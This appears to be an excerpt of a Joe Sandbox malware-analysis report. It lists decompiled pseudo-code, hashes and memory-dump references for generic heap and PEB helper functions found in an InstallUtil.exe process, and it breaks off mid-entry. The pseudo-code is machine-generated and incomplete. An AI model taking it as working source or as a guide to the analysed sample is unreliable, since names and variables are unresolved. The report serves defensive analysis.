
Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0416e2594170a51d3927ad040bd47611a7c82a69c4215aebc215b09134698855
Instruction ID: 47059df9f148fd00e06d4571f8ec2ae3f5608087cb0db8d6ceebb16f5543b13e
Opcode Fuzzy Hash: 0416e2594170a51d3927ad040bd47611a7c82a69c4215aebc215b09134698855
Instruction Fuzzy Hash: ABE0DFB02292069FDB35DB59D240F2D3B989B52729F19809DE90A4B182C621E882C29E

Uniqueness

Uniqueness Score: -1.00%

Function 013541E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E013541E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x13a08f0);
				_t5 = E0131D08C(__ebx, __edi, __esi);
				if( *0x13b87ec == 0) {
					E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x13b87ec == 0) {
						 *0x13b87f0 = 0x13b87ec;
						 *0x13b87ec = 0x13b87ec;
						 *0x13b87e8 = 0x13b87e4;
						 *0x13b87e4 = 0x13b87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01354248();
				}
				return E0131D0D1(_t5);
			}

0x013541e8
0x013541ea
0x013541ef
0x013541fb
0x01354206
0x0135420b
0x01354216
0x0135421d
0x01354222
0x0135422c
0x01354231
0x01354231
0x01354236
0x0135423d
0x0135423d
0x01354247

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dc5439ef33ac7ca7046ed46fd2f307ce05e6f989f8a387a8c0f6fdf79ef4b8a
Instruction ID: 44fdd5b5933ffaaadb917a2359bec77e43fd78b0f4b9ff637414801d70fe8b35
Opcode Fuzzy Hash: 8dc5439ef33ac7ca7046ed46fd2f307ce05e6f989f8a387a8c0f6fdf79ef4b8a
Instruction Fuzzy Hash: F0F01578820709CECBB4EFA9E58AB2436ACFB5476EF10419A920087688F73444A5CF01

Uniqueness

Uniqueness Score: -1.00%

Function 0137D380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0137D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L012CE8B0(__ecx, _a4, 0xfff);
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0137d38a
0x0137d39b
0x0137d3b1
0x00000000
0x0137d3b6
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 547d157db2c7bf989d5fbdf90bfea1d904a847171d3bdf42bc6f2ca6b0969c10
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: E5E0C231280209BBEB325E84CC00F797B5ADF50BA4F104035FE085AAA0C6799C91DAC4

Uniqueness

Uniqueness Score: -1.00%

Function 012FA185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012FA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x13b67e4 >= 0xa) {
					if(_t5 < 0x13b6800 || _t5 >= 0x13b6900) {
						return L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E012E0010(0x13b67e0, _t5);
				}
			}

0x012fa190
0x012fa1a6
0x012fa1c2
0x00000000
0x00000000
0x00000000
0x012fa192
0x012fa192
0x012fa19f
0x012fa19f

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66fdeaa55dbd7f2a26a20b8a1c1293e5a2d0d88fedd8c8d39e65293b15362df3
Instruction ID: bb6611b749807794d3fbed2cb15e3fc623c467ed3c7d0e981fd38fb4675b9952
Opcode Fuzzy Hash: 66fdeaa55dbd7f2a26a20b8a1c1293e5a2d0d88fedd8c8d39e65293b15362df3
Instruction Fuzzy Hash: B0D02BE117100016D62D130098AAB76365EF794754F35041CF30B4BD92F9508CD88118

Uniqueness

Uniqueness Score: -1.00%

Function 012F16E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012F16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E012F1710(0x13b67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L012E4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x012f16e8
0x012f16ef
0x012f16f3
0x012f16fe
0x00000000
0x012f1700
0x012f170d
0x012f170d
0x012f16f2
0x012f16f2
0x012f16f2
0x012f16f2

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32edc6a781c05cce2960a4178e0e4eef7b85ccf4708db712b5aacedd8fbbc404
Instruction ID: e3b800a106db2546de602f8784c0e00ca59e366d72ff63d5351d494200ebf2c1
Opcode Fuzzy Hash: 32edc6a781c05cce2960a4178e0e4eef7b85ccf4708db712b5aacedd8fbbc404
Instruction Fuzzy Hash: ABD0A771120142DAEE2D5B149845B246655EB90785F78007CF30B598C1EFA1DCB2E44C

Uniqueness

Uniqueness Score: -1.00%

Function 013453CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E013453CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E012DEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x013453ca
0x013453ce
0x013453d9
0x013453de
0x013453e1
0x013453e1
0x013453e6
0x013453f3
0x00000000
0x013453f8
0x013453fb

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 9d0ace69c7427e3d5e507c4bb844c1e240345a23e0c39d56dcf035d0c8e359b6
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 5EE08C329507809BCF16EB49C650F5EBBF5FB44B00F150044A0085F620C624AC00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 012DAAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012DAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x012daab6
0x012daabb
0x0132a442
0x00000000
0x0132a448
0x0132a454
0x0132a454
0x012daac1
0x012daac1
0x012daac6
0x012daac6

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 5b99b5335035badbbd1c91bfd57479bcbb833ac54e7e18a60a371fea36dbfc88
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: CBD0E939352991CFD617DB1DC554B1577B4BB44B44FD50590E501CBB62E62CD944CA00

Uniqueness

Uniqueness Score: -1.00%

Function 012F35A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012F35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E012DEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x012f35a1
0x012f35a1
0x012f35a5
0x012f35ab
0x012f35ab
0x012f35b5
0x00000000
0x012f35c1
0x012f35b7

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: ec7aa5a2bf8d403c3c5facbd2d3bd7911160f564557e015ec8094069a5746a44
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 48D0A77143118299DF01EB14E11C7FCB771BB44308F58107D834109452C3354909C700

Uniqueness

Uniqueness Score: -1.00%

Function 012CDB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L012E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x012cdb4d
0x012cdb54
0x012cdb5f
0x012cdb56
0x012cdb56
0x012cdb5c
0x012cdb5c

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 95e828255a598526802eee51770d6c9c2e23a59ffb5902e4d2c1c64589e12344
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 74C08C302A0A42AEEB222F20CD01B103AA0BB10F01F8400A06700DA0F0EB78D801EA00

Uniqueness

Uniqueness Score: -1.00%

Function 0134A537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0134A537(intOrPtr _a4, intOrPtr _a8) {

				return L012E8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0134a553

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: f75e952279074d14de345b12572e83f9afd1430fe2727e82b2c9dc165f7c6ac8
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 55C08C33080248BBCB126F81CC00F267F6AFBA4B60F048010FA480B570C632E970EB94

Uniqueness

Uniqueness Score: -1.00%

Function 012E3A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012E3A1C(intOrPtr _a4) {
				void* _t5;

				return L012E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x012e3a35

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: a23b48ed9b8bd8d286760d11c143447df584b60ed5f87a2a260f07fa1ed5fd32
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: B0C08C32080288BBCB126E41DC00F117B69E7A0B60F000020BA080A5608532EC60D98C

Uniqueness

Uniqueness Score: -1.00%

Function 012CAD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CAD30(intOrPtr _a4) {

				return L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x012cad49

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 5af7c26f40d60857d88766a2b22142e985b3434ca076347fb2104e5459abf6ed
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 34C02B330C0248BBC7166F46DD00F117F6DE7A0B60F000020F6040B671C932EC60D5C8

Uniqueness

Uniqueness Score: -1.00%

Function 012D76E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012D76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x012d76e4
0x00000000
0x012d76f8
0x012d76fd

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 6b613d982ab21ba9e1804cc76b8fe2ac2a89bed6c00a5b2e7bf224b67277be2d
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: A3C08C701A11825EEB2E570CCE24B307A90AB0860CF88019CAB01094E2D36CA802C288

Uniqueness

Uniqueness Score: -1.00%

Function 012F36CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012F36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x012f36d2
0x012f36e8
0x012f36d4
0x012f36e5
0x012f36e5

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 0d8fc6b5744271ee3b470349d7c08a4516109c81588a938d94cd7c0c945f82b0
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 0DC02B70170480FFDB156F30CD00F24B2D4F700A21FA403687320854F0D528DC00D50C

Uniqueness

Uniqueness Score: -1.00%

Function 012E7D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012E7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x012e7d56
0x012e7d5b
0x012e7d60
0x012e7d5d
0x012e7d5d
0x012e7d5d

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: c38cd9e402216bfc490b473bd3cdb6c37e96630d498e2907ce44739c0ca6f1c4
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: FFB09235311942CFCE16DF18C084B1533E8BB44A40F8400D0E400CBA21D32AE8008900

Uniqueness

Uniqueness Score: -1.00%

Function 012F2ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012F2ACB() {
				void* _t5;

				return E012DEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x012f2adc

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 5a0124c324424514ba7891299b668fb3b8c527669462d7ec0f4df916990edb2c
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: B5B01232C20541CFCF02FF40C610B297331FB00750F06449090012B930C228BC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01309950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dee667bba821a137e044d059010fdf955fb60f82a330f7f12f15ca5a0b3e20f7
Instruction ID: 7c3af462cf6d045dc2e6e3775a19200237cb0d1c8996e5dfe1dad5e2cbc58738
Opcode Fuzzy Hash: dee667bba821a137e044d059010fdf955fb60f82a330f7f12f15ca5a0b3e20f7
Instruction Fuzzy Hash: 799002A520141403D544659948086070405A7D1346F51C421A2054555ECA698C657175

Uniqueness

Uniqueness Score: -1.00%

Function 013099D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f35747f847b3e77a9c9bd355bc687029de3d5aa6c19350df66b75539c03045
Instruction ID: dc65bbfc53d3a22b3b18fb6f48d7f1720abec74e082aacd7a40f306698b19c5f
Opcode Fuzzy Hash: 01f35747f847b3e77a9c9bd355bc687029de3d5aa6c19350df66b75539c03045
Instruction Fuzzy Hash: B19002A521101042D508619944087060445A7E2345F51C422A2144554CC5698C756165

Uniqueness

Uniqueness Score: -1.00%

Function 01309820 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e88820a7e99ef475c6d014ebdb6e2aef1d0e66535682ef93ab86f75e70b476
Instruction ID: a8e8f4231b41dfc3032920b8f1b7ae52afcc2fcd138785d4918543d3cf31f220
Opcode Fuzzy Hash: b0e88820a7e99ef475c6d014ebdb6e2aef1d0e66535682ef93ab86f75e70b476
Instruction Fuzzy Hash: F590027524101402D545719944086060409B7D1385F91C422A0414554EC6958A6ABAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0130B040 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2d52e281404eec23fa97d29f8d51074f1f5aa0572b36beb09b9ef5cec2e65e4
Instruction ID: 7dbf43c3fe44aece7c548a3e0586d462efd79169df008138055ea6cd102e7291
Opcode Fuzzy Hash: d2d52e281404eec23fa97d29f8d51074f1f5aa0572b36beb09b9ef5cec2e65e4
Instruction Fuzzy Hash: EC9002A5601150438944B19948084065415B7E2345391C531A0444560CC6A88869A2A5

Uniqueness

Uniqueness Score: -1.00%

Function 013098A0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b377f492f3885cb10921b5c2aa608edf0744f0e97e0e0f1ab23e5d1b9e0e63d8
Instruction ID: 08bb7e90d150d3b1be341968f75cddc306ac77f225857ce35c07475ab870cd8a
Opcode Fuzzy Hash: b377f492f3885cb10921b5c2aa608edf0744f0e97e0e0f1ab23e5d1b9e0e63d8
Instruction Fuzzy Hash: 7E90026530101402D506619944186060409E7D2389F91C422E1414555DC6658967B172

Uniqueness

Uniqueness Score: -1.00%

Function 01309B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63f2634648613efb6768e2d4380e969f7aa96ae827393cca44ce5c6d2e236b48
Instruction ID: 7fb035a1a2413589fcccf666919fdeb1852a3ab476d5a905332ace62d2a47ca4
Opcode Fuzzy Hash: 63f2634648613efb6768e2d4380e969f7aa96ae827393cca44ce5c6d2e236b48
Instruction Fuzzy Hash: C690026524101802D544719984187070406E7D1745F51C421A0014554DC656897976F1

Uniqueness

Uniqueness Score: -1.00%

Function 0130A3B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecfd6d94182ab58a221d9e58cd823d9ce13e3173701ad59e83cbfbbe785ad006
Instruction ID: b65f4f09cf0bc54eb742201c51806bf76b6a6893d75c4f04129cff69e6425ea5
